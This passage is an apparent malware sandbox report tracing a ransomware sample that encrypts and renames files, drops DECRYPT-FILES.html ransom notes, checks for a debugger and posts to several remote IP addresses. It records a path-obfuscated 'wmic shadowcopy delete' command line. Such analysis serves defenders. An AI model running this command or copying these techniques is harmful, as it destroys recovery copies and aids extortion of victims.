Create C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Recovery\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\System Volume Information\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE False 1
Fn
Create C:\System Volume Information\\DECRYPT-FILES.html desired_access = GENERIC_WRITE False 1
Fn
Create C:\Users\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
Create C:\Users\\DECRYPT-FILES.html desired_access = GENERIC_WRITE False 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeCMapFnt10.lst desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeSysFnt10.lst desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\Cache\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\Cache\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\Cache\AcroFnt10.lst desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\Cache\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\SharedDataEvents desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\UserCache.bin desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
Get Info C:\Boot\BCD.LOG1 type = size, size_out = 0 True 1
Fn
Get Info C:\Boot\BCD.LOG2 type = size, size_out = 0 True 1
Fn
Get Info C:\Boot\BOOTSTAT.DAT type = size, size_out = 65536 True 1
Fn
Get Info C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi type = size, size_out = 3170304 True 1
Fn
Get Info C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim type = size, size_out = 169213970 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeCMapFnt10.lst type = size, size_out = 35116 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeSysFnt10.lst type = size, size_out = 138459 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\Cache\AcroFnt10.lst type = size, size_out = 53188 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\SharedDataEvents type = size, size_out = 5120 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\UserCache.bin type = size, size_out = 77477 True 1
Fn
Move C:\Boot\BOOTSTAT.DAT.R0GsRvs source_filename = C:\Boot\BOOTSTAT.DAT True 1
Fn
Move C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi.XvZHI source_filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi True 1
Fn
Move C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.9emKr source_filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeCMapFnt10.lst.wHLcdW source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeCMapFnt10.lst True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeSysFnt10.lst.34tSh1K source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeSysFnt10.lst True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\Cache\AcroFnt10.lst.iHt9 source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\Cache\AcroFnt10.lst True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\SharedDataEvents.6PFi source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\SharedDataEvents True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\UserCache.bin.KH4Dw9W source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\UserCache.bin True 1
Fn
Read C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim size = 264, size_out = 264 True 1
Fn
Data
Read C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim size = 1048576, size_out = 1048576 True 161
Fn
Data
Read C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim size = 1048576, size_out = 393234 True 1
Fn
Read C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim size = 1048576, size_out = 0 True 1
Fn
Write C:\\DECRYPT-FILES.html size = 6586 True 1
Fn
Data
Write C:\$Recycle.Bin\\DECRYPT-FILES.html size = 6586 True 1
Fn
Data
Write C:\$Recycle.Bin\S-1-5-21-3388679973-3930757225-3770151564-1000\\DECRYPT-FILES.html size = 6586 True 1
Fn
Data
Write C:\Boot\\DECRYPT-FILES.html size = 6586 True 1
Fn
Data
Write C:\Boot\BOOTSTAT.DAT size = 264 True 1
Fn
Data
Write C:\Boot\cs-CZ\\DECRYPT-FILES.html size = 6586 True 1
Fn
Data
Write C:\Boot\da-DK\\DECRYPT-FILES.html size = 6586 True 1
Fn
Data
Write C:\Boot\de-DE\\DECRYPT-FILES.html size = 6586 True 1
Fn
Data
Write C:\Boot\el-GR\\DECRYPT-FILES.html size = 6586 True 1
Fn
Data
Write C:\Boot\en-US\\DECRYPT-FILES.html size = 6586 True 1
Fn
Data
Write C:\Boot\es-ES\\DECRYPT-FILES.html size = 6586 True 1
Fn
Data
Write C:\Boot\fi-FI\\DECRYPT-FILES.html size = 6586 True 1
Fn
Data
Write C:\Boot\Fonts\\DECRYPT-FILES.html size = 6586 True 1
Fn
Data
Write C:\Boot\fr-FR\\DECRYPT-FILES.html size = 6586 True 1
Fn
Data
Write C:\Boot\hu-HU\\DECRYPT-FILES.html size = 6586 True 1
Fn
Data
Write C:\Boot\it-IT\\DECRYPT-FILES.html size = 6586 True 1
Fn
Data
Write C:\Boot\ja-JP\\DECRYPT-FILES.html size = 6586 True 1
Fn
Data
Write C:\Boot\ko-KR\\DECRYPT-FILES.html size = 6586 True 1
Fn
Data
Write C:\Boot\nb-NO\\DECRYPT-FILES.html size = 6586 True 1
Fn
Data
Write C:\Boot\nl-NL\\DECRYPT-FILES.html size = 6586 True 1
Fn
Data
Write C:\Boot\pl-PL\\DECRYPT-FILES.html size = 6586 True 1
Fn
Data
Write C:\Boot\pt-BR\\DECRYPT-FILES.html size = 6586 True 1
Fn
Data
Write C:\Boot\pt-PT\\DECRYPT-FILES.html size = 6586 True 1
Fn
Data
Write C:\Boot\ru-RU\\DECRYPT-FILES.html size = 6586 True 1
Fn
Data
Write C:\Boot\sv-SE\\DECRYPT-FILES.html size = 6586 True 1
Fn
Data
Write C:\Boot\tr-TR\\DECRYPT-FILES.html size = 6586 True 1
Fn
Data
Write C:\Boot\zh-CN\\DECRYPT-FILES.html size = 6586 True 1
Fn
Data
Write C:\Boot\zh-HK\\DECRYPT-FILES.html size = 6586 True 1
Fn
Data
Write C:\Boot\zh-TW\\DECRYPT-FILES.html size = 6586 True 1
Fn
Data
Write C:\Config.Msi\\DECRYPT-FILES.html size = 6586 True 1
Fn
Data
Write C:\Documents and Settings\\DECRYPT-FILES.html size = 6586 True 1
Fn
Data
Write C:\MSOCache\\DECRYPT-FILES.html size = 6586 True 1
Fn
Data
Write C:\PerfLogs\\DECRYPT-FILES.html size = 6586 True 1
Fn
Data
Write C:\PerfLogs\Admin\\DECRYPT-FILES.html size = 6586 True 1
Fn
Data
Write C:\Recovery\\DECRYPT-FILES.html size = 6586 True 1
Fn
Data
Write C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\DECRYPT-FILES.html size = 6586 True 1
Fn
Data
Write C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi size = 264 True 1
Fn
Data
Write C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim size = 1048576 True 161
Fn
Data
Write C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim size = 393234 True 1
Fn
Write C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim size = 264 True 1
Fn
Write C:\Users\5p5NrGJn0jS HALPmcxz\\DECRYPT-FILES.html size = 6586 True 1
Fn
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\\DECRYPT-FILES.html size = 6586 True 1
Fn
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\\DECRYPT-FILES.html size = 6586 True 1
Fn
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\\DECRYPT-FILES.html size = 6586 True 1
Fn
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\\DECRYPT-FILES.html size = 6586 True 1
Fn
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\\DECRYPT-FILES.html size = 6586 True 1
Fn
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeCMapFnt10.lst size = 264 True 1
Fn
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeSysFnt10.lst size = 264 True 1
Fn
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\Cache\\DECRYPT-FILES.html size = 6586 True 1
Fn
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\Cache\AcroFnt10.lst size = 264 True 1
Fn
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\SharedDataEvents size = 264 True 1
Fn
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\UserCache.bin size = 264 True 1
Fn
Registry (2)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = ProductName, data = 87 True 1
Fn
Process (54)
»
Operation Process Additional Information Success Count Logfile
Create C:\m\..\Windows\ovxhp\sff\qyv\..\..\..\system32\w\sfc\roma\..\..\..\wbem\ux\dgfg\..\..\wmic.exe os_pid = 0xa78, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Enumerate Processes - - True 52
Fn
Enumerate Processes - - False 1
Fn
Module (63)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 39
Fn
Get Handle c:\windows\syswow64\advapi32.dll base_address = 0x74d40000 True 2
Fn
Get Handle c:\windows\syswow64\ole32.dll base_address = 0x755e0000 True 4
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Wow64DisableWow64FsRedirection, address_out = 0x76c4d650 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Wow64RevertWow64FsRedirection, address_out = 0x76c4d668 True 1
Fn
Create Mapping C:\Boot\BCD.LOG1 filename = C:\Boot\BCD.LOG1, protection = PAGE_READWRITE, maximum_size = 0 False 1
Fn
Create Mapping C:\Boot\BCD.LOG2 filename = C:\Boot\BCD.LOG2, protection = PAGE_READWRITE, maximum_size = 0 False 1
Fn
Create Mapping C:\Boot\BOOTSTAT.DAT filename = C:\Boot\BOOTSTAT.DAT, protection = PAGE_READWRITE, maximum_size = 0 True 1
Fn
Create Mapping C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi, protection = PAGE_READWRITE, maximum_size = 0 True 1
Fn
Create Mapping C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeCMapFnt10.lst filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeCMapFnt10.lst, protection = PAGE_READWRITE, maximum_size = 0 True 1
Fn
Create Mapping C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeSysFnt10.lst filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeSysFnt10.lst, protection = PAGE_READWRITE, maximum_size = 0 True 1
Fn
Create Mapping C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\Cache\AcroFnt10.lst filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\Cache\AcroFnt10.lst, protection = PAGE_READWRITE, maximum_size = 0 True 1
Fn
Create Mapping C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\SharedDataEvents filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\SharedDataEvents, protection = PAGE_READWRITE, maximum_size = 0 True 1
Fn
Create Mapping C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\UserCache.bin filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\UserCache.bin, protection = PAGE_READWRITE, maximum_size = 0 True 1
Fn
Map C:\Boot\BOOTSTAT.DAT process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\test.exe, desired_access = FILE_MAP_WRITE True 1
Fn
Map C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\test.exe, desired_access = FILE_MAP_WRITE True 1
Fn
Map C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeCMapFnt10.lst process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\test.exe, desired_access = FILE_MAP_WRITE True 1
Fn
Map C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeSysFnt10.lst process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\test.exe, desired_access = FILE_MAP_WRITE True 1
Fn
Map C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\Cache\AcroFnt10.lst process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\test.exe, desired_access = FILE_MAP_WRITE True 1
Fn
Map C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\SharedDataEvents process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\test.exe, desired_access = FILE_MAP_WRITE True 1
Fn
Map C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\UserCache.bin process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\test.exe, desired_access = FILE_MAP_WRITE True 1
Fn
User (1)
»
Operation Additional Information Success Count Logfile
Get Username user_name_out = 5p5NrGJn0jS HALPmcxz True 1
Fn
Window (1)
»
Operation Window Name Additional Information Success Count Logfile
Create kfw96 9 5 class_name = kfw96 9 5, wndproc_parameter = 0 True 1
Fn
System (39)
»
Operation Additional Information Success Count Logfile
Get Computer Name result_out = XDUWTFONO True 1
Fn
Sleep duration = 1000 milliseconds (1.000 seconds) True 17
Fn
Sleep duration = -1 (infinite) False 1
Fn
Get Time type = Ticks, time = 118077 True 1
Fn
Get Time type = Ticks, time = 118139 True 1
Fn
Get Time type = Ticks, time = 118155 True 3
Fn
Get Time type = Ticks, time = 118825 True 1
Fn
Get Time type = Ticks, time = 118997 True 2
Fn
Get Time type = Ticks, time = 119200 True 2
Fn
Get Time type = Ticks, time = 119481 True 1
Fn
Get Time type = Ticks, time = 121602 True 1
Fn
Get Time type = Ticks, time = 134363 True 1
Fn
Get Time type = Ticks, time = 134738 True 1
Fn
Get Time type = Ticks, time = 134878 True 1
Fn
Get Time type = Ticks, time = 134925 True 1
Fn
Get Time type = Ticks, time = 135034 True 1
Fn
Get Time type = Ticks, time = 135112 True 1
Fn
Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Mutex (1)
»
Operation Additional Information Success Count Logfile
Create mutex_name = 9cda09f29c354b42 True 1
Fn
Debug (50)
»
Operation Process Additional Information Success Count Logfile
Check for Presence c:\users\5p5nrgjn0js halpmcxz\desktop\test.exe - True 50
Fn
Network Behavior
TCP Sessions (1)
»
Information Value
Total Data Sent 0 bytes
Total Data Received 0 bytes
Contacted Host Count 1
Contacted Hosts 92.63.37.100
TCP Session #1
»
Information Value
Remote Address 92.63.37.100
Remote Port 80
Local Address 192.168.0.176
Local Port 49160
Data Sent 0 bytes
Data Received 0 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 92.63.37.100, remote_port = 80 True 1
Fn
Send flags = NO_FLAG_SET, size = 500, size_out = 500 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 117
Fn
Data
Receive flags = NO_FLAG_SET, size = 0, size_out = 0 True 1
Fn
Close type = SOCK_STREAM True 1
Fn
HTTP Sessions (3)
»
Information Value
Total Data Sent 1.49 KB
Total Data Received 2.40 KB
Contacted Host Count 3
Contacted Hosts 92.63.37.100, 92.63.32.2, 92.63.8.47
HTTP Session #1
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
Server Name 92.63.8.47
Server Port 80
Username -
Password -
Data Sent 512 bytes
Data Received 1.37 KB
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko True 1
Fn
Open Connection protocol = http, server_name = 92.63.8.47, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = /archive/fxc.action?sdp=q&g=6oix0&qbaa=6b&k=u7a7u True 1
Fn
Send HTTP Request headers = User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko, Host: 92.63.8.47, Content-Type: application/x-www-form-urlencoded, Content-Length: 247, Connection: Keep-Alive, url = 92.63.8.47/archive/fxc.action?sdp=q&g=6oix0&qbaa=6b&k=u7a7u True 1
Fn
Data
Read Response size = 1, size_out = 1 True 160
Fn
Data
Read Response size = 1245, size_out = 1245 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #2
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
Server Name 92.63.32.2
Server Port 80
Username -
Password -
Data Sent 513 bytes
Data Received 349 bytes
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko True 1
Fn
Open Connection protocol = http, server_name = 92.63.32.2, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = /tbrelgdfl.cgi?ah=wjfq2ey&j=23t84u4&ytxn=8kk6be554 True 1
Fn
Send HTTP Request headers = User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko, Host: 92.63.32.2, Content-Type: application/x-www-form-urlencoded, Content-Length: 247, Connection: Keep-Alive, url = 92.63.32.2/tbrelgdfl.cgi?ah=wjfq2ey&j=23t84u4&ytxn=8kk6be554 True 1
Fn
Data
Read Response size = 1, size_out = 1 True 179
Fn
Data
Read Response size = 170, size_out = 170 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #3
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
Server Name 92.63.37.100
Server Port 80
Username -
Password -
Data Sent 500 bytes
Data Received 705 bytes
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 92.63.37.100, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, target_resource = /post/checkout/mkgqp.cgi?iii=8128v5, accept_types = 0 True 1
Fn
Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 92.63.37.100/post/checkout/mkgqp.cgi?iii=8128v5 False 1
Fn
Data
Process #2: svchost.exe
0 0
»
Information Value
ID #2
File Name c:\windows\system32\svchost.exe
Command Line C:\Windows\system32\svchost.exe -k netsvcs
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:00:37, Reason: RPC Server
Unmonitor End Time: 00:01:15, Reason: Terminated by Timeout
Monitor Duration 00:00:38
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x36c
Parent PID 0x1cc (c:\windows\system32\services.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x 850
0x 790
0x 798
0x 7F8
0x 430
0x 268
0x 768
0x 764
0x 760
0x 75C
0x 70C
0x 6E8
0x 6D8
0x 6D4
0x 6C8
0x 6C0
0x 6B8
0x 6A4
0x 6A0
0x 690
0x 67C
0x 490
0x 454
0x 450
0x 428
0x 424
0x 420
0x 404
0x 18C
0x F0
0x C8
0x 3F0
0x 3E4
0x 398
0x 394
0x 390
0x 38C
0x 378
0x 370
0x A5C
0x A60
0x A9C
0x AA0
0x AA4
0x AA8
0x AAC
0x AB0
0x AB4
0x AB8
0x ABC
0x AC0
0x AC8
0x ACC
Process #4: wmic.exe
163 0
»
Information Value
ID #4
File Name c:\windows\system32\wbem\wmic.exe
Command Line "C:\m\..\Windows\ovxhp\sff\qyv\..\..\..\system32\w\sfc\roma\..\..\..\wbem\ux\dgfg\..\..\wmic.exe" shadowcopy delete
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:55, Reason: Child Process
Unmonitor End Time: 00:01:15, Reason: Terminated by Timeout
Monitor Duration 00:00:20
OS Process Information
»
Information Value
PID 0xa78
Parent PID 0xa38 (c:\users\5p5nrgjn0js halpmcxz\desktop\test.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x A7C
0x A98
0x AD8
0x ADC
0x AE0
0x AE4
Host Behavior
COM (6)
»
Operation Class Interface Additional Information Success Count Logfile
Create WBEMLocator IWbemLocator cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create F6D90F12-9C73-11D3-B32E-00C04F990BB4 2933BF95-7B36-11D2-B20E-00C04F983E60 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = root\cli True 1
Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = root\cli\ms_409 True 1
Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = \\XDUWTFONO\ROOT\CIMV2 True 1
Fn
Execute WBEMLocator IWbemServices method_name = ExecQuery, query_language = WQL, query = SELECT * FROM Win32_ShadowCopy False 1
Fn
Registry (5)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Logging, data = 48 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Logging Directory True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Logging Directory, data = 37 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Log File Max Size, data = 54 True 1
Fn
Module (3)
»
Operation Module Additional Information Success Count Logfile
Load C:\Windows\system32\kernel32.dll base_address = 0x76e30000 True 1
Fn
Get Handle c:\windows\system32\wbem\wmic.exe base_address = 0xff4a0000 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x76e46d40 True 1
Fn
System (7)
»
Operation Additional Information Success Count Logfile
Get Computer Name result_out = XDUWTFONO True 1
Fn
Get Time type = System Time, time = 2019-06-01 18:40:49 (UTC) True 1
Fn
Get Time type = Ticks, time = 119855 True 1
Fn
Get Time type = Performance Ctr, time = 17832216577 True 1
Fn
Get Time type = Local Time, time = 2019-06-02 04:40:51 (Local Time) True 1
Fn
Get Info type = System Directory, result_out = C:\Windows\system32 True 2
Fn
Process #5: wmiprvse.exe
0 0
»
Information Value
ID #5
File Name c:\windows\system32\wbem\wmiprvse.exe
Command Line C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:01, Reason: RPC Server
Unmonitor End Time: 00:01:15, Reason: Terminated by Timeout
Monitor Duration 00:00:14
Remark No high level activity detected in monitored regions
OS Process Information
»
